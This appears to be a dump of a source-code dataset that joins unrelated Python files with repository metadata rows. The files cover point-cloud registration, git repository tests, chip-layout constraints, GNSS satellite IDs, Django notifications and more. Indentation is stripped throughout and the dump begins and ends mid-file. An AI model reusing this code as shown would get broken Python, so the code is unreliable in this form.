def execute_global_registration(source_down, target_down, source_fpfh,
target_fpfh, voxel_size):
distance_threshold = voxel_size * 1.5
print(":: RANSAC registration on downsampled point clouds.")
print(" Since the downsampling voxel size is %.3f," % voxel_size)
print(" we use a liberal distance threshold %.3f." % distance_threshold)
result = o3d.registration.registration_ransac_based_on_feature_matching(
source_down, target_down, source_fpfh, target_fpfh, distance_threshold,
o3d.registration.TransformationEstimationPointToPoint(False), 4, [
o3d.registration.CorrespondenceCheckerBasedOnEdgeLength(0.9),
o3d.registration.CorrespondenceCheckerBasedOnDistance(
distance_threshold)
], o3d.registration.RANSACConvergenceCriteria(4000000, 500))
return result
def refine_registration(source, target, source_fpfh, target_fpfh, voxel_size):
distance_threshold = voxel_size * 0.4
print(":: Point-to-plane ICP registration is applied on original point")
print(" clouds to refine the alignment. This time we use a strict")
print(" distance threshold %.3f." % distance_threshold)
result = o3d.registration.registration_icp(
source, target, distance_threshold, result_ransac.transformation,
o3d.registration.TransformationEstimationPointToPlane())
return result
if __name__ == "__main__":
voxel_size = 0.05 # means 5cm for the dataset
source, target, source_down, target_down, source_fpfh, target_fpfh = \
prepare_dataset(voxel_size)
result_ransac = execute_global_registration(source_down, target_down,
source_fpfh, target_fpfh,
voxel_size)
print(result_ransac)
draw_registration_result(source_down, target_down,
result_ransac.transformation)
result_icp = refine_registration(source, target, source_fpfh, target_fpfh,
voxel_size)
print(result_icp)
draw_registration_result(source, target, result_icp.transformation)
| 44.170213
| 80
| 0.701108
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 747
| 0.179913
|
a257f947f9d83091dd668f62bb9fa0c75a8eafcd
| 2,698
|
py
|
Python
|
src/get_test_results.py
|
williamdjones/deep_protein_binding
|
10b00835024702b6d0e73092c777fed267215ca7
|
[
"MIT"
] | null | null | null |
src/get_test_results.py
|
williamdjones/deep_protein_binding
|
10b00835024702b6d0e73092c777fed267215ca7
|
[
"MIT"
] | null | null | null |
src/get_test_results.py
|
williamdjones/deep_protein_binding
|
10b00835024702b6d0e73092c777fed267215ca7
|
[
"MIT"
] | null | null | null |
import os
import argparse
import pandas as pd
import numpy as np
from sklearn.metrics import f1_score, r2_score
from tqdm import tqdm
parser = argparse.ArgumentParser()
parser.add_argument("--exp_dir", type=str, help="path to directory containing test results",
default="/scratch/wdjo224/deep_protein_binding/experiments")
parser.add_argument("--exp_name", type=str, help="name of the experiment to collect results", default="binding_debug")
parser.add_argument("--exp_type", type=str, help="indicate regression (reg) or classification (class)",
default="class")
parser.add_argument("--exp_epoch", type=int, help="which epoch to get results for", default=4)
args = parser.parse_args()
test_dict = {"path": [], "score": []}
test_list = []
print("reading test results...")
for root, dirs, files in tqdm(os.walk(args.exp_dir), total=len(os.listdir(args.exp_dir))):
if "test_results" in root and args.exp_name in root and "epoch{}".format(args.exp_epoch) in root:
process = root.split("/")[-1].split("_")[0]
test_df = pd.DataFrame({"idx": [], "pred": [], "true": [], "loss": []})
for file in os.listdir(root):
test_df = pd.concat([test_df, pd.read_csv(root + "/" + file, index_col=0)])
score = None
if args.exp_type == "class":
y_true = test_df.true.apply(lambda x: np.argmax(np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32)))
y_pred = test_df.pred.apply(lambda x: np.argmax(np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32)))
score = f1_score(y_pred=y_pred, y_true=y_true)
elif args.exp_type == "reg":
y_true = test_df.true.apply(lambda x: np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32))
y_pred = test_df.pred.apply(lambda x: np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32))
score = r2_score(y_pred=y_pred, y_true=y_true)
else:
raise Exception("not a valid output type")
test_list.append({"path": root, "score": score, "process": process})
print("finished reading. finding best result")
best_score = -9999999
best_idx = 0
for idx, test in tqdm(enumerate(test_list)):
if test["score"] > best_score:
best_score = test["score"]
best_idx = idx
best_test = test_list[best_idx]
print("best test results:\n score: {} \t process: {} \t path: {}".format(best_test["score"], best_test["process"],
best_test["path"]))
pd.DataFrame(test_list).sort_values(by="score", ascending=False).to_csv(
"/scratch/wdjo224/deep_protein_binding/"+args.exp_name+"_test_results.csv")
| 46.517241
| 118
| 0.636027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 676
| 0.250556
|
a2595f5495569bfb18a30651ccf4bc3e61dec9b6
| 35
|
py
|
Python
|
analysis/Leo/scripts/__init__.py
|
data301-2020-winter2/course-project-group_1039
|
26d661a543ce9dcea61f579f9edbcde88543e7c3
|
[
"MIT"
] | 1
|
2021-02-09T02:13:23.000Z
|
2021-02-09T02:13:23.000Z
|
analysis/Leo/scripts/__init__.py
|
data301-2020-winter2/course-project-group_1039
|
26d661a543ce9dcea61f579f9edbcde88543e7c3
|
[
"MIT"
] | 31
|
2021-02-02T17:03:39.000Z
|
2021-04-13T03:22:16.000Z
|
analysis/Leo/scripts/__init__.py
|
data301-2020-winter2/course-project-group_1039
|
26d661a543ce9dcea61f579f9edbcde88543e7c3
|
[
"MIT"
] | 1
|
2021-03-14T05:56:16.000Z
|
2021-03-14T05:56:16.000Z
|
import scripts.project_functions
| 8.75
| 32
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
a25a29dc91019ce3281b5fcc6f7a268059eba344
| 8,278
|
py
|
Python
|
align/pnr/write_constraint.py
|
ALIGN-analoglayout/ALIGN-public
|
80c25a2ac282cbfa199bd21ad85277e9376aa45d
|
[
"BSD-3-Clause"
] | 119
|
2019-05-14T18:44:34.000Z
|
2022-03-17T01:01:02.000Z
|
align/pnr/write_constraint.py
|
ALIGN-analoglayout/ALIGN-public
|
80c25a2ac282cbfa199bd21ad85277e9376aa45d
|
[
"BSD-3-Clause"
] | 717
|
2019-04-03T15:36:35.000Z
|
2022-03-31T21:56:47.000Z
|
align/pnr/write_constraint.py
|
ALIGN-analoglayout/ALIGN-public
|
80c25a2ac282cbfa199bd21ad85277e9376aa45d
|
[
"BSD-3-Clause"
] | 34
|
2019-04-01T21:21:27.000Z
|
2022-03-21T09:46:57.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 13 14:50:24 2021
@author: kunal001
"""
import pathlib
import pprint
import json
import logging
from ..schema import constraint
logger = logging.getLogger(__name__)
pp = pprint.PrettyPrinter(indent=4)
class PnRConstraintWriter:
def __init__(self):
pass
def map_valid_const(self,all_const):
"""
Maps input format to pnr format
"""
logger.debug(f"input constraints {all_const}")
#Start mapping
pnr_const=[]
for input_const in constraint.expand_user_constraints(all_const):
# Create dict for PnR constraint
# and handle common field aliasing
const = input_const.dict(
exclude = {'constraint'},
exclude_unset=True)
const['const_name'] = input_const.__class__.__name__
if 'instances' in const:
const['blocks'] = const['instances']
del const['instances']
# Add dict to PnR constraint list
if not const['const_name'] in ('NetConst', 'PortLocation', 'MultiConnection'):
pnr_const.append(const)
# Constraint-specific field transformations
if const["const_name"] == 'Order':
const["const_name"] = 'Ordering'
if const["direction"] in ("left_to_right", "horizontal"):
const["direction"] = 'H'
elif const["direction"] in ("top_to_bottom", "vertical"):
const["direction"] = 'V'
else:
raise NotImplementedError(f'PnR does not support direction {const["direction"]} yet')
elif const["const_name"] == 'SameTemplate':
logger.info( f'found a SameTemplate: {const}')
elif const["const_name"] == 'MatchBlocks':
const["const_name"] = 'MatchBlock'
const['block1'] = const['blocks'][0]
const['block2'] = const['blocks'][1]
del const['blocks']
elif const["const_name"] == 'BlockDistance':
const["const_name"] = 'bias_graph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'HorizontalDistance':
const["const_name"] = 'bias_Hgraph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'VerticalDistance':
const["const_name"] = 'bias_Vgraph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'AspectRatio':
const["const_name"] = 'Aspect_Ratio'
del const['subcircuit']
elif const["const_name"] == 'Boundary':
del const['subcircuit']
for key in ['max_width', 'max_height']:
if const[key] is None:
del const[key]
elif const["const_name"] == 'SymmetricBlocks':
const["const_name"] = 'SymmBlock'
const["axis_dir"] = const.pop("direction")
pairs = []
for blocks in const["pairs"]:
if len(blocks)==1:
temp = {
"type": "selfsym",
"block": blocks[0]
}
elif len(blocks)==2:
temp = {
"type":"sympair",
"block1":blocks[0],
"block2":blocks[1]
}
else:
logger.warning(f"invalid group for symmetry {blocks}")
pairs.append(temp)
const["pairs"] = pairs
elif const["const_name"] == 'GroupCaps':
const["const_name"] = 'CC'
const["cap_name"] = const.pop("name").upper()
const["unit_capacitor"] = const.pop("unit_cap").upper()
const["size"] = const.pop("num_units")
const["nodummy"] = not const["dummy"]
const["cap_r"] = -1
const["cap_s"] = -1
del const["dummy"]
del const["blocks"]
elif const["const_name"] == 'Align':
const["const_name"] = 'AlignBlock'
if const['line'] not in ['h_bottom', 'h_top', 'v_right', 'v_left', 'v_center']:
raise NotImplementedError(f'PnR does not support edge {const["line"]} yet')
elif const["const_name"] == 'SymmetricNets':
const["const_name"] = 'SymmNet'
const["axis_dir"] = const.pop("direction")
if "pins1" in const and "pins2" in const:
pins1 = self._map_pins(const["pins1"])
pins2 = self._map_pins(const["pins2"])
del const["pins1"]
del const["pins2"]
else:
pins1 = [{"type": "dummy", "name": "dummy", "pin": None}]
pins2 = [{"type": "dummy", "name": "dummy", "pin": None}]
const['net1'] = {
"name": const['net1'],
"blocks": pins1}
const['net2'] = {
"name": const['net2'],
"blocks": pins2}
elif const["const_name"] == 'PortLocation':
for port in const["ports"]:
extra = {
"const_name" : 'PortLocation',
"location" : const["location"],
"terminal_name" : port
}
pnr_const.append(extra)
elif const["const_name"] == 'MultiConnection':
for net in const["nets"]:
extra = {
"const_name": 'Multi_Connection',
"multi_number": int(const["multiplier"]),
"net_name": net.upper() # TODO: Revert after case sensitivity is restored
}
pnr_const.append(extra)
elif const["const_name"] == 'NetConst':
for net in const["nets"]:
if 'shield' in const and 'criticality' in const and not const['shield'] == "None":
extra = {
"const_name" : 'ShieldNet',
"net_name" : net,
"shield_net" : const["shield"]
}
pnr_const.append(extra)
extra = {
"const_name" : 'CritNet',
"net_name" : net,
"priority" : const["criticality"]
}
pnr_const.append(extra)
elif 'shield' in const and not const['shield'] =="None":
extra = {
"const_name" : 'ShieldNet',
"net_name" : net,
"shield_net" : const["shield"]
}
pnr_const.append(extra)
elif 'criticality' in const and const['shield'] =="None":
extra = {
"const_name" : 'CritNet',
"net_name" : net,
"priority" : const["criticality"]
}
pnr_const.append(extra)
logger.debug(f"Const mapped to PnR const format {pnr_const}")
return {'constraints': pnr_const}
def _map_pins(self,pins:list):
blocks=[]
for pin in pins:
if '/' in pin:
temp = {
"type":"pin",
"name":pin.split('/')[0],
"pin":pin.split('/')[1]
}
else:
temp = {
"type":"terminal",
"name":pin,
"pin":None
}
blocks.append(temp)
return blocks
| 42.451282
| 105
| 0.439841
| 8,002
| 0.966659
| 0
| 0
| 0
| 0
| 0
| 0
| 2,547
| 0.307683
|
a25a329785c9f77e159427cefe14e85a15f3128c
| 157
|
py
|
Python
|
ch02/number_eight.py
|
joy-joy/pcc
|
6c7d166a1694a2c3f371307aea6c4bdf340c4c42
|
[
"MIT"
] | null | null | null |
ch02/number_eight.py
|
joy-joy/pcc
|
6c7d166a1694a2c3f371307aea6c4bdf340c4c42
|
[
"MIT"
] | null | null | null |
ch02/number_eight.py
|
joy-joy/pcc
|
6c7d166a1694a2c3f371307aea6c4bdf340c4c42
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 9 00:00:43 2018
@author: joy
"""
print(5 + 3)
print(9 - 1)
print(2 * 4)
print(16//2)
| 13.083333
| 35
| 0.573248
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 102
| 0.649682
|
a25a47c51ab943aef82605acc3a660cf6ca5f070
| 7,042
|
py
|
Python
|
tests/test_git_factory.py
|
kostya0shift/SyncToGit
|
b3f2ec7e1167a0b032d4d40726de625d31a02354
|
[
"MIT"
] | 1
|
2015-03-14T15:33:12.000Z
|
2015-03-14T15:33:12.000Z
|
tests/test_git_factory.py
|
kostya0shift/SyncToGit
|
b3f2ec7e1167a0b032d4d40726de625d31a02354
|
[
"MIT"
] | null | null | null |
tests/test_git_factory.py
|
kostya0shift/SyncToGit
|
b3f2ec7e1167a0b032d4d40726de625d31a02354
|
[
"MIT"
] | null | null | null |
import os
from contextlib import ExitStack
from pathlib import Path
import pytest
from synctogit.git_factory import GitError, git_factory
def remotes_dump(remote_name, remote):
# fmt: off
return (
"%(remote_name)s\t%(remote)s (fetch)\n"
"%(remote_name)s\t%(remote)s (push)"
) % locals()
# fmt: on
def test_git_missing_dir(temp_dir):
d = str(Path(temp_dir) / "non-existing-dir")
with pytest.raises(GitError):
git_factory(d)
@pytest.mark.parametrize(
"remote_name, remote",
[
# fmt: off
("origin", None),
("angel", "git@github.com:KostyaEsmukov/SyncToGit.git"),
# fmt: on
],
)
def test_git_new_existing_empty_dir(call_git, temp_dir, remote_name, remote):
branch = "spooky"
d = str(Path(temp_dir) / "myrepo")
os.mkdir(d)
git_factory(d, branch=branch, remote_name=remote_name, remote=remote)
git_root = call_git("git rev-parse --show-toplevel", cwd=d)
assert git_root == d
git_commits = call_git(r'git log --all --pretty=format:"%D %s" -n 2', cwd=d)
assert git_commits == (
"HEAD -> spooky Update .gitignore (automated commit by synctogit)"
)
git_branch = call_git("git symbolic-ref --short HEAD", cwd=d)
assert git_branch == branch
git_branches = call_git(
"git for-each-ref --format='%(refname:short)' refs/heads/", cwd=d
)
assert git_branches == branch
git_remotes = call_git("git remote -v", cwd=d)
if remote:
assert git_remotes == remotes_dump(remote_name, remote)
else:
assert git_remotes == ""
def test_git_new_existing_dirty_dir(temp_dir):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
with open(str(p / "file"), "wt") as f:
f.write("")
with pytest.raises(GitError): # Dirty dir
git_factory(d)
def test_git_load_existing_empty(call_git, temp_dir):
d = str(Path(temp_dir) / "myrepo")
os.mkdir(d)
call_git("git init", cwd=d)
with pytest.raises(GitError): # No initial commit
git_factory(d)
@pytest.mark.parametrize(
"remote_name, remote, shadow_remote",
[
("origin", None, None),
("angel", "git@github.com:KostyaEsmukov/SyncToGit.git", None),
("angel", "git@github.com:new/remote.git", "git@github.com:old/remote.git"),
("angel", "git@github.com:same/remote.git", "git@github.com:same/remote.git"),
],
)
def test_git_load_existing_not_empty(
call_git, temp_dir, remote_name, remote, shadow_remote
):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
with open(str(p / "file"), "wt") as f:
f.write("")
call_git("git init", cwd=d)
call_git("git add .", cwd=d)
call_git('git commit -m "The Cake is a lie"', cwd=d)
if shadow_remote:
call_git(f"git remote add {remote_name} {shadow_remote}", cwd=d)
with ExitStack() as stack:
if shadow_remote and remote != shadow_remote:
stack.enter_context(pytest.raises(GitError))
git = git_factory(d, remote_name=remote_name, remote=remote)
if shadow_remote and remote != shadow_remote:
return
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
git_remotes = call_git("git remote -v", cwd=d)
if remote:
assert git_remotes == remotes_dump(remote_name, remote)
else:
assert git_remotes == ""
with pytest.raises(GitError):
git_factory(d, branch="some-other-branch")
def test_git_nested(call_git, temp_dir):
root = Path(temp_dir) / "myroot"
inner = root / "myinner"
os.mkdir(str(root))
call_git("git init", cwd=str(root))
os.mkdir(str(inner))
git_factory(str(inner))
git_root = call_git("git rev-parse --show-toplevel", cwd=str(root))
assert git_root == str(root)
git_root = call_git("git rev-parse --show-toplevel", cwd=str(inner))
assert git_root == str(inner)
@pytest.mark.parametrize("is_up_to_date", [False, True])
def test_gitignore_existing(call_git, temp_dir, is_up_to_date):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
gitignore_file = p / ".gitignore"
if is_up_to_date:
gitignore_file.write_text(".synctogit*")
else:
gitignore_file.write_text("*.something")
call_git("git init", cwd=d)
call_git("git add .", cwd=d)
call_git('git commit -m "The Cake is a lie"', cwd=d)
git = git_factory(d)
if is_up_to_date:
assert git.head.commit.summary == "The Cake is a lie"
else:
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
assert gitignore_file.read_text() == (
# fmt: off
"*.something\n"
".synctogit*\n"
# fmt: on
)
@pytest.mark.parametrize("dirty", ["repo", "gitignore"])
@pytest.mark.parametrize("is_dirty_staged", [False, True])
@pytest.mark.parametrize("is_new_file", [False, True])
def test_gitignore_update_with_dirty_repo(
call_git, temp_dir, dirty, is_dirty_staged, is_new_file
):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
gitignore_file = p / ".gitignore"
if dirty == "gitignore":
dirty_file = gitignore_file
elif dirty == "repo":
dirty_file = p / ".lalalala"
call_git("git init", cwd=d)
if not is_new_file:
dirty_file.write_text("*.pdf")
call_git("git add .", cwd=d)
call_git('git commit --allow-empty -m "The Cake is a lie"', cwd=d)
dirty_file.write_text("*.something")
if is_dirty_staged:
call_git("git add .", cwd=d)
with ExitStack() as stack:
if dirty == "gitignore":
stack.enter_context(pytest.raises(GitError))
git = git_factory(d)
dirty_file.read_text() == "*.something"
if dirty == "gitignore":
# No commits should be created
git_commits = call_git(r'git log --all --pretty=format:"%D %s" -n 2', cwd=d)
assert git_commits == ("HEAD -> master The Cake is a lie")
elif dirty == "repo":
# Dirty changes should be there and still not be committed.
gitignore_file.read_text() == ".synctogit*\n"
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
# Only .gitignore should be committed
git_show = call_git('git show --pretty="" --name-only', cwd=d)
assert git_show == ".gitignore"
# Ensure that the dirty files are in the same staged/unstaged state
git_status = call_git("git status --porcelain", cwd=d, space_trim=False)
if is_new_file:
prefix = "A " if is_dirty_staged else "?? "
else:
prefix = "M " if is_dirty_staged else " M "
assert git_status.startswith(prefix)
| 29.965957
| 86
| 0.626527
| 0
| 0
| 0
| 0
| 5,642
| 0.801193
| 0
| 0
| 2,042
| 0.289974
|
a25ad39526f4933af2df581028f2688cffce6933
| 2,117
|
py
|
Python
|
pychron/fractional_loss_calculator.py
|
ASUPychron/pychron
|
dfe551bdeb4ff8b8ba5cdea0edab336025e8cc76
|
[
"Apache-2.0"
] | 31
|
2016-03-07T02:38:17.000Z
|
2022-02-14T18:23:43.000Z
|
pychron/fractional_loss_calculator.py
|
ASUPychron/pychron
|
dfe551bdeb4ff8b8ba5cdea0edab336025e8cc76
|
[
"Apache-2.0"
] | 1,626
|
2015-01-07T04:52:35.000Z
|
2022-03-25T19:15:59.000Z
|
pychron/fractional_loss_calculator.py
|
UIllinoisHALPychron/pychron
|
f21b79f4592a9fb9dc9a4cb2e4e943a3885ededc
|
[
"Apache-2.0"
] | 26
|
2015-05-23T00:10:06.000Z
|
2022-03-07T16:51:57.000Z
|
# ===============================================================================
# Copyright 2019 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from numpy import linspace
from traits.api import HasTraits, Int, Float, Instance, on_trait_change
from traitsui.api import View, VGroup, UItem, Item, HGroup
from pychron.graph.graph import Graph
from pychron.processing.argon_calculations import calculate_fractional_loss
class FractionalLossCalculator(HasTraits):
graph = Instance(Graph)
temp = Float(475)
min_age = Int(1)
max_age = Int(1000)
radius = Float(0.1)
def __init__(self, *args, **kw):
super(FractionalLossCalculator, self).__init__(*args, **kw)
self.graph = g = Graph()
g.new_plot()
xs, ys = self._calculate_data()
g.new_series(xs, ys)
def _calculate_data(self):
xs = linspace(self.min_age, self.max_age)
fs = [calculate_fractional_loss(ti, self.temp, self.radius) for ti in xs]
return xs, fs
@on_trait_change("temp, radius, max_age, min_age")
def _replot(self):
xs, ys = self._calculate_data()
self.graph.set_data(xs)
self.graph.set_data(ys, axis=1)
def traits_view(self):
a = HGroup(Item("temp"), Item("radius"), Item("min_age"), Item("max_age"))
v = View(VGroup(a, UItem("graph", style="custom")))
return v
if __name__ == "__main__":
f = FractionalLossCalculator()
f.configure_traits()
# ============= EOF =============================================
| 34.145161
| 82
| 0.616911
| 958
| 0.452527
| 0
| 0
| 186
| 0.08786
| 0
| 0
| 867
| 0.409542
|
a25bd49134a1f86571250e2c3fa2596b40823392
| 1,043
|
py
|
Python
|
chatrooms/mixer/thread.py
|
Dogeek/ChatAggregator
|
c1cf700e2529d6bb78ce7e4850c532ef55841d85
|
[
"MIT"
] | 3
|
2019-11-17T19:31:08.000Z
|
2020-12-07T00:47:22.000Z
|
chatrooms/mixer/thread.py
|
Dogeek/ChatAggregator
|
c1cf700e2529d6bb78ce7e4850c532ef55841d85
|
[
"MIT"
] | 16
|
2019-11-17T19:48:02.000Z
|
2019-11-24T02:49:44.000Z
|
chatrooms/mixer/thread.py
|
Dogeek/ChatAggregator
|
c1cf700e2529d6bb78ce7e4850c532ef55841d85
|
[
"MIT"
] | 3
|
2019-11-17T19:31:13.000Z
|
2019-11-21T11:59:18.000Z
|
import asyncio
import threading
from .connection import MixerConnection
from .utils import get_channel_id
from chatrooms import lock
class MixerThread(threading.Thread):
def __init__(self, **kwargs):
super().__init__()
self.channel_id = get_channel_id(kwargs.pop("channel_name"))
self.mixer_connection = MixerConnection(self.channel_id,
kwargs.pop("oauth_token", None))
@property
def last_message(self):
"""
Pops the first text message from the queue.
:return: str, first message of the queue.
"""
try:
return self.mixer_connection.messages.popleft()
except IndexError:
return None
def run(self):
asyncio.set_event_loop(asyncio.new_event_loop())
with lock:
asyncio.get_event_loop().run_until_complete(self.mixer_connection.run())
def quit(self):
self.mixer_connection.running = False
asyncio.get_event_loop().close()
| 30.676471
| 84
| 0.628955
| 908
| 0.870566
| 0
| 0
| 288
| 0.276127
| 0
| 0
| 145
| 0.139022
|
a25bec9b2e01804b38b6f619f80dd7f9ad6e8b87
| 44
|
py
|
Python
|
test/py.py
|
PhilipDeegan/mkn
|
399dd01990e130c4deeb0c2800204836d3875ae9
|
[
"BSD-3-Clause"
] | 61
|
2015-02-05T07:43:13.000Z
|
2020-05-19T13:26:50.000Z
|
test/py.py
|
mkn/mkn
|
a05b542497270def02200df6620804b89429259b
|
[
"BSD-3-Clause"
] | 29
|
2016-11-21T03:37:42.000Z
|
2020-10-18T12:04:53.000Z
|
test/py.py
|
mkn/mkn
|
a05b542497270def02200df6620804b89429259b
|
[
"BSD-3-Clause"
] | 12
|
2016-01-05T05:35:29.000Z
|
2020-03-15T11:03:37.000Z
|
#! /usr/bin/python3
print("HELLO PYTHON")
| 8.8
| 21
| 0.659091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 33
| 0.75
|
a25c1f80b839438c40bc8b1ec20e3dcbcc9d3fa1
| 181
|
py
|
Python
|
proxy_config.py
|
Nou4r/YandexMail-Account-Creator
|
b65f24630d23c59dfb8d196f3efe5a222aa3e11a
|
[
"MIT"
] | 1
|
2021-11-23T05:28:16.000Z
|
2021-11-23T05:28:16.000Z
|
proxy_config.py
|
Nou4r/YandexMail-Account-Creator
|
b65f24630d23c59dfb8d196f3efe5a222aa3e11a
|
[
"MIT"
] | null | null | null |
proxy_config.py
|
Nou4r/YandexMail-Account-Creator
|
b65f24630d23c59dfb8d196f3efe5a222aa3e11a
|
[
"MIT"
] | null | null | null |
try:
with open('proxies.txt', 'r') as file:
proxy = [ line.rstrip() for line in file.readlines()]
except FileNotFoundError:
raise Exception('Proxies.txt not found.')
| 36.2
| 61
| 0.662983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.220994
|
a25c2ec82a6c0af9fd73752dd6ceae9477f697d3
| 1,577
|
py
|
Python
|
src/notifications/middleware.py
|
MAE776569/project-manager
|
986a1a8b84950da81e98125d70ae3ef380e96e54
|
[
"Apache-2.0"
] | null | null | null |
src/notifications/middleware.py
|
MAE776569/project-manager
|
986a1a8b84950da81e98125d70ae3ef380e96e54
|
[
"Apache-2.0"
] | 7
|
2020-03-24T17:08:34.000Z
|
2022-02-10T09:50:00.000Z
|
src/notifications/middleware.py
|
MAE776569/project-manager
|
986a1a8b84950da81e98125d70ae3ef380e96e54
|
[
"Apache-2.0"
] | null | null | null |
from .models import NotificationManager
from django.utils.deprecation import MiddlewareMixin
class NotificationMiddleware(MiddlewareMixin):
def process_request(self, request):
if request.user.is_authenticated:
notif_id = request.GET.get('notif_id', None)
ref = request.GET.get('ref', None)
if notif_id and ref == 'notif':
NotificationManager.objects.get_or_create(notification_id=notif_id,
user=request.user)
query = '''select case when notification_manager.notification_id
is null then false else true end seen,
notification.* from notification_manager
right outer join notification
on notification_manager.notification_id=notification.id
and notification_manager.user_id={0}
where notification.admin_only={1}
and notification.users_only={2}
and notification.created_at >= '{3}'
order by notification.created_at desc
limit 5;'''
if request.user.is_admin:
query = query.format(request.user.id, True, False,
request.user.date_joined)
else:
query = query.format(request.user.id, False, True,
request.user.date_joined)
request.notifications = list(NotificationManager.objects.raw(query))
count = 0
for notif in request.notifications:
count += int(not notif.seen)
request.notifications_count = count
| 41.5
| 83
| 0.616994
| 1,482
| 0.939759
| 0
| 0
| 0
| 0
| 0
| 0
| 554
| 0.3513
|
a25c6100f9d37d3d232cbc72e44c946c286a4444
| 5,167
|
py
|
Python
|
tests/test_prns.py
|
mfkiwl/laika-gnss
|
dc38f251dbc7ebb535a3c220de8424634d297248
|
[
"MIT"
] | 365
|
2018-12-17T07:43:34.000Z
|
2022-03-29T22:23:39.000Z
|
tests/test_prns.py
|
mfkiwl/laika-gnss
|
dc38f251dbc7ebb535a3c220de8424634d297248
|
[
"MIT"
] | 36
|
2019-07-24T10:20:45.000Z
|
2022-02-14T22:11:24.000Z
|
tests/test_prns.py
|
mfkiwl/laika-gnss
|
dc38f251dbc7ebb535a3c220de8424634d297248
|
[
"MIT"
] | 156
|
2018-12-17T05:06:23.000Z
|
2022-03-31T12:06:07.000Z
|
import unittest
from laika.helpers import get_constellation, get_prn_from_nmea_id, \
get_nmea_id_from_prn, NMEA_ID_RANGES
SBAS_DATA = [
['S01', 33],
['S02', 34],
['S10', 42],
['S22', 54],
['S23', 55],
['S32', 64],
['S33', 120],
['S64', 151],
['S65', 152],
['S71', 158]
]
MAIN_CONSTELLATIONS = [
['G01', 1],
['G10', 10],
['G32', 32],
['R01', 65],
['R10', 74],
['R23', 87],
['R24', 88],
['R25', 89],
['R32', 96],
['E01', 301],
['E02', 302],
['E36', 336],
['C01', 201],
['C02', 202],
['C29', 229],
['J01', 193],
['J04', 196]
]
class TestConstellationPRN(unittest.TestCase):
def test_constellation_from_valid_prn(self):
data = [
['G01', 'GPS'],
['G10', 'GPS'],
['G32', 'GPS'],
['R01', 'GLONASS'],
['R10', 'GLONASS'],
['R23', 'GLONASS'],
['R24', 'GLONASS'],
['R25', 'GLONASS'],
['R32', 'GLONASS'],
['E01', 'GALILEO'],
['E02', 'GALILEO'],
['E36', 'GALILEO'],
['C01', 'BEIDOU'],
['C02', 'BEIDOU'],
['C29', 'BEIDOU'],
['J01', 'QZNSS'],
['J04', 'QZNSS'],
['S01', 'SBAS'],
['I01', 'IRNSS']
]
for prn, expected_constellation in data:
constellation = get_constellation(prn)
self.assertEqual(constellation, expected_constellation)
def test_constellation_from_prn_with_invalid_identifier(self):
prn = '?01'
self.assertWarns(UserWarning, get_constellation, prn)
self.assertIsNone(get_constellation(prn))
def test_constellation_from_prn_outside_range(self):
prn = 'G99'
constellation = get_constellation(prn)
self.assertEqual(constellation, 'GPS')
def test_prn_from_nmea_id_for_main_constellations(self):
data = MAIN_CONSTELLATIONS
for expected_prn, nmea_id in data:
prn = get_prn_from_nmea_id(nmea_id)
self.assertEqual(prn, expected_prn)
def test_prn_from_nmea_id_for_SBAS(self):
'''Probably numbering SBAS as single constellation doesn't make
sense, but programmatically it works the same as for others
constellations.'''
data = SBAS_DATA
for expected_prn, nmea_id in data:
prn = get_prn_from_nmea_id(nmea_id)
self.assertEqual(prn, expected_prn)
def test_prn_from_invalid_nmea_id(self):
data = [
(-1, "?-1"),
(0, "?0"),
(100, "?100"),
(160, "?160"),
(190, "?190"),
(300, "?300")
]
for nmea_id, expected_prn in data:
self.assertWarns(UserWarning, get_prn_from_nmea_id, nmea_id)
self.assertEqual(get_prn_from_nmea_id(nmea_id), expected_prn)
self.assertRaises(TypeError, get_prn_from_nmea_id, None)
self.assertRaises(TypeError, get_prn_from_nmea_id, '1')
def test_nmea_id_from_prn_for_main_constellations(self):
data = MAIN_CONSTELLATIONS
for prn, expected_nmea_id in data:
nmea_id = get_nmea_id_from_prn(prn)
self.assertEqual(nmea_id, expected_nmea_id)
def test_nmea_id_from_prn_for_SBAS(self):
'''Probably numbering SBAS as single constellation doesn't make
sense, but programmatically it works the same as for others
constellations.'''
data = SBAS_DATA
for prn, expected_nmea_id in data:
nmea_id = get_nmea_id_from_prn(prn)
self.assertEqual(nmea_id, expected_nmea_id)
def test_nmea_id_from_invalid_prn(self):
# Special unknown constellation - valid number
self.assertEqual(1, get_nmea_id_from_prn('?01'))
self.assertEqual(-1, get_nmea_id_from_prn('?-1'))
# Special unknown constellation - invalid number
self.assertRaises(ValueError, get_nmea_id_from_prn, '???')
# Constellation with unknwown identifier
